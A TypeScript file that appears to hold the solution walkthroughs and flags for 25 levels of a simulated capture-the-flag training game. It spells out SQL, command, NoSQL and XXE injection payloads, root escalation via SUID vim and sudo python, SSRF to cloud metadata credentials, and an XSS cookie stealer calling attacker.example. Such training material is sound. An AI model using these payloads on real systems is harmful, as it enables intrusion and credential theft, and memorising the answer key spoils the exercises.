export const WALKTHROUGHS: Record<string, string[]> = {
  '1': [
    'Use `pwd` to confirm you are in the home directory.',
    'Run `ls` to see the visible files in the current directory.',
    'Use `cat /var/log/syslog` or `grep password /var/log/syslog` to inspect the system log.',
    'The output contains log lines describing authentication events and a leaked flag line.',
    'Copy the flag (FLAG{log_watcher_2024}) and run `submit-flag <flag>` to complete the level.',
  ],
  '2': [
    'Use `ls -la` in /home/user to show hidden dotfiles.',
    'Notice the `.secret` file in the listing (files starting with a dot are hidden by default).',
    'Read the hidden file with `cat .secret` or `cat /home/user/.secret`.',
    'The terminal prints the flag (FLAG{dotfile_hunter_7h3_d4rk}).',
    'Submit it using `submit-flag <flag>`.',
  ],
  '3': [
    'The target is 10.0.0.1. Run `nmap 10.0.0.1` to scan for open ports.',
    'The Nmap output lists services: FTP (21), SSH (22), HTTP (80), MySQL (3306).',
    'Look at the bottom of the Nmap report for the flag (FLAG{nmap_service_discovery}).',
    'Copy the flag and run `submit-flag <flag>`.',
  ],
  '4': [
    'The web root may have hidden directories. Run `dirb http://target/` or `gobuster -u http://target/`.',
    'Look for an `admin_panel_v2` or similar path in the results.',
    'The brute-force summary includes the flag (FLAG{dirb_hidden_d00r}).',
    'Submit it using `submit-flag <flag>`.',
  ],
  '5': [
    'Open the Target Web Preview to see the login form.',
    'In the Username field, type `admin`.',
    'In the Password field, enter the SQL injection payload: `\' OR \'1\'=\'1`.',
    'Click LOGIN. The backend treats the query as always-true and authenticates as admin.',
    'The success message gives you the flag (FLAG{sqli_auth_bypass}). Copy it.',
  ],
  '6': [
    'In the Target Web Preview, the profile page shows `?id=102`.',
    'Click into the `id=` input and change the value to `1`.',
    'Click the search icon. The page now displays the Administrator profile.',
    'The admin profile exposes the flag (FLAG{idor_horizontal_privesc}).',
  ],
  '7': [
    'Open the Cookie Editor in the Target Web Preview.',
    'The `session` cookie is a base64 JWT. It currently decodes to `user`.',
    'Set the cookie value to `YWRtaW4=` (base64 for `admin`).',
    'Click APPLY COOKIE. The decoded role becomes `admin` and the flag (FLAG{cookie_admin_baked}) is shown.',
  ],
  '8': [
    'A secret image `secret.jpg` exists. Run `exiftool secret.jpg` in the terminal.',
    'ExifTool prints the image metadata, including a Comment field.',
    'The Comment contains the flag (FLAG{exif_undercover}).',
    'Submit with `submit-flag <flag>`.',
  ],
  '9': [
    'The MD5 hash is stored at `/home/user/hash.txt`. Run `john /home/user/hash.txt`.',
    'John the Ripper identifies the hash format and cracks it quickly.',
    'The output shows the cracked password and the flag (FLAG{john_the_ripper_hash}).',
    'Copy the flag and run `submit-flag <flag>`.',
  ],
  '10': [
    'SUID binaries run with owner privileges. Run `find / -perm -4000` to locate one.',
    'The output points to `/usr/bin/vim` as a SUID binary.',
    'Escalate with `vim -c \'!sh\'`. This spawns a root shell.',
    'The output proves you are root and prints the flag (FLAG{suid_vim_escalation}).',
  ],
  '11': [
    'Run `sudo -l` to list allowed sudo commands.',
    'Notice `python3` can be run as root without a password.',
    'Exploit it with: `sudo python3 -c "import os; os.system(\'/bin/sh\')"`.',
    'A root shell opens and the terminal prints the flag (FLAG{sudo_python_privesc}).',
  ],
  '12': [
    'The hidden API is `http://target/api/v1/internal/config`.',
    'Run `curl http://target/api/v1/internal/config` in the terminal.',
    'The JSON body includes an AWS key and the flag (FLAG{api_internal_exposed}).',
    'Run `submit-flag <flag>`.',
  ],
  '13': [
    'Run `ftp 10.0.0.5` to start an anonymous FTP session.',
    'When asked, enter username `anonymous` and password `anonymous`.',
    'Run `ls` to list files, then `get backup.zip` to download it.',
    'The server confirms the download and prints the flag (FLAG{ftp_anonymous_l00t}).',
  ],
  '14': [
    'In the Target Web Preview, open the Network Diagnostics tool.',
    'The ping field accepts any IP, but does not sanitize chaining.',
    'Enter `8.8.8.8; cat /etc/passwd` in the IP input.',
    'Click PING. The output runs both commands and reveals the flag (FLAG{cmd_injection_ping_pong}).',
  ],
  '15': [
    'Open the JWT Forger in the Target Web Preview.',
    'Set the Header to: `{"alg":"none"}`.',
    'Set the Payload to: `{"admin":true}`.',
    'Click FORGE TOKEN. The server accepts the unsigned token and returns the flag (FLAG{jwt_none_algorithm}).',
  ],
  '16': [
    'The S3 bucket is `s3://company-public-assets/`.',
    'Run `aws s3 ls s3://company-public-assets/` to list objects.',
    'Run `aws s3 cp s3://company-public-assets/.env .` to download the environment file.',
    'The file contents include the flag (FLAG{s3_bucket_leak}).',
    'Run `submit-flag <flag>`.',
  ],
  '17': [
    'In the Target Web Preview, the Comment Stream accepts HTML.',
    'Enter a stored XSS payload such as `<script>fetch("https://attacker.example/?c="+document.cookie)</script>`.',
    'Click POST COMMENT. The payload is rendered as HTML.',
    'The success banner reveals the flag (FLAG{xss_cookie_stealer}).',
  ],
  '18': [
    'A packet capture is at `/var/backups/capture.pcap`.',
    'Run `strings /var/backups/capture.pcap` to extract printable strings.',
    'Look through the output for the HTTP POST to `/login` and the plaintext credentials.',
    'The last line of the strings output contains the flag (FLAG{pcap_password_plains}).',
  ],
  '19': [
    'An SSH private key is in `/var/backups/id_rsa`.',
    'Run `ssh -i /var/backups/id_rsa root@target` to authenticate.',
    'The terminal shows `whoami` as `root` and prints the flag.',
    'Copy the flag (FLAG{ssh_key_hijack_achieved}) and run `submit-flag <flag>`.',
  ],
  '20': [
    'Start with `GetUserSPNs.py -dc-ip 10.0.0.10 -request`.',
    'The script requests a TGS for the MSSQLService SPN and saves the hash to `/home/user/tgs.hash`.',
    'Crack the hash with `john /home/user/tgs.hash`.',
    'The cracked password `AdminPass1!` is displayed together with the flag (FLAG{kerberoasting_db_admin}).',
  ],
  '21': [
    'The target has a proxy at `http://target/fetch?url=`.',
    'Cloud metadata is hosted at `http://169.254.169.254/latest/meta-data/iam/security-credentials/admin`.',
    'Run the SSRF request: `curl "http://target/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"`.',
    'The proxy returns the IAM credentials JSON including the flag (FLAG{ssrf_cloud_metadata}).',
  ],
  '22': [
    'The XML import endpoint is `http://target/api/import`.',
    'Build an XXE payload with an external entity pointing to `/etc/passwd`.',
    'Send: `curl -X POST -d "<?xml version=\\"1.0\\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>" http://target/api/import`.',
    'The response includes `/etc/passwd` contents and the flag (FLAG{xxe_internal_leak}).',
  ],
  '23': [
    'The file viewer is `http://target/download?file=`.',
    'Use path traversal with `....//` to escape the webroot: `curl "http://target/download?file=....//....//etc/passwd"`.',
    'The server returns the contents of `/etc/passwd`.',
    'The output ends with the flag (FLAG{lfi_path_traversal}).',
  ],
  '24': [
    'The NoSQL login is at `http://target/nosql-login`.',
    'Send a JSON body that uses the `$ne` operator: `curl -X POST -H "Content-Type: application/json" -d \'{"username":{"$ne":null}}\' http://target/nosql-login`.',
    'The server accepts any non-null username and logs you in as admin.',
    'The JSON response contains the flag (FLAG{nosql_operator_bypass}).',
  ],
  '25': [
    'The `.git` directory is exposed via `http://target/.git/HEAD`.',
    'Run `curl http://target/.git/HEAD` in the terminal.',
    'The response is a `ref:` line showing the current branch.',
    'The response also contains the flag (FLAG{git_exposed_head}).',
    'Run `submit-flag <flag>`.',
  ],
};
